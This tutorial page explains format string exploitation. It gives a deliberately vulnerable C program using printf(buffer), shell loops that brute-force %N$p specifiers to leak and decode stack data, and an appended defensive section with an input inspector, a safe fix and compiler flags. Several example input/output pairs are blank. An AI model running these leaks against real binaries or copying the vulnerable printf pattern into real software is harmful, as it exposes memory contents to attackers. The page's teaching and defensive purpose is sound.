Binary Exploitation with Format String

Last modified: 2023-08-14

Reverse Engineering

This exploitation becomes possible when a binary uses attacker-supplied input as the format string of a printf-family call.


If a binary reads user input and then prints it by passing it directly to printf as the format string, we can abuse the format specifiers in that input.

// example.c
#include <stdio.h>

int main(void)
{
    char buffer[12];

    // User input is handed to printf as the format string itself, so any % specifiers in it are interpreted
    fgets(buffer, sizeof(buffer), stdin);
    printf("The result is ");
    printf(buffer);
    return 0;
}

For example, entering %x as shown below makes printf read a value from the stack and print it in hexadecimal.


# Input 1 (read value as hex)
# output

# Input 2 (read multiple values as hex)
%x %x %x %x
# output
78252078 0 ceddc980 447c8d80 0

# Input 3 (read offset values as hex)
# output

# Input 4 (read offset values as hex)
# output

# Input 5 (read pointer address)
# output

# Input 6 (read offset pointer address)
# output


Below is an example of exploiting the format string.
We can read pointer addresses and values from the stack by brute forcing the positional offset (%N$p).

# Brute force pointers: walk the positional specifiers from %20$p down to %1$p
for i in {20..1}; do echo "%${i}\$p" | ./example; done

# Brute force pointers %11$p down to %6$p, strip the output prefix, turn the hex back into bytes, then reverse the bytes
# cut -c 15-: keep from character 15 onward, i.e. drop the 14-character prefix "The result is "
# xxd -ps: plain hexdump style (no offsets or columns)
# xxd -r: reverse operation, convert a hexdump back into binary
# rev: reverse each line character-wise, which undoes the little-endian byte order of the leaked words
(for i in {11..6}; do echo "%${i}\$p" | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev
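As an added example (not code from the original page), the following shows the defensive side of both the vulnerable example.c above and the positional brute-force loop: inspect_format walks untrusted input the way printf would, counting conversions, noting the %N$ positional form the loop relies on, and flagging %n, which would write to memory; print_result_safe is the fix for example.c, a constant format string with the user data passed only as an argument. The struct and function names are my own.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Summary of what a printf-family call would do with an untrusted string. */
typedef struct {
    int conversions;  /* "%x", "%p", ... ("%%" is a literal percent and is not counted) */
    int positional;   /* conversions written in the "%N$..." form */
    bool writes;      /* true if any "%n" is present: printf would write to memory */
} format_probe;

/* Skip one specifier starting just after its '%'. Returns a pointer to the
   conversion character, or to the terminating NUL if the specifier is cut off. */
static const char *skip_specifier(const char *p, bool *is_positional)
{
    const char *q = p;
    while (*q >= '0' && *q <= '9') q++;                    /* leading digits: "N" of "N$", or a width */
    if (q > p && *q == '$') { *is_positional = true; q++; }
    while (*q && strchr("-+ #0", *q)) q++;                 /* flags */
    while ((*q >= '0' && *q <= '9') || *q == '*') q++;     /* width */
    if (*q == '.') { q++; while ((*q >= '0' && *q <= '9') || *q == '*') q++; } /* precision */
    while (*q && strchr("hlLjzt", *q)) q++;                /* length modifiers */
    return q;
}

/* Inspect untrusted input before it can reach printf(buffer)-style code. */
format_probe inspect_format(const char *s)
{
    format_probe r = {0, 0, false};
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }                /* escaped literal '%' */
        bool pos = false;
        const char *conv = skip_specifier(p + 1, &pos);
        r.conversions++;                                   /* a cut-off trailing '%' still counts */
        if (pos) r.positional++;
        if (*conv == 'n') r.writes = true;
        if (*conv == '\0') break;
        p = conv;
    }
    return r;
}

/* The fix for example.c: a constant format string; user data is only ever an argument. */
void print_result_safe(const char *user)
{
    printf("The result is %s\n", user);
}
```

Building with -Wall -Wformat -Werror=format-security makes gcc and clang reject the printf(buffer) call in example.c at compile time, which catches the bug before any runtime check is needed.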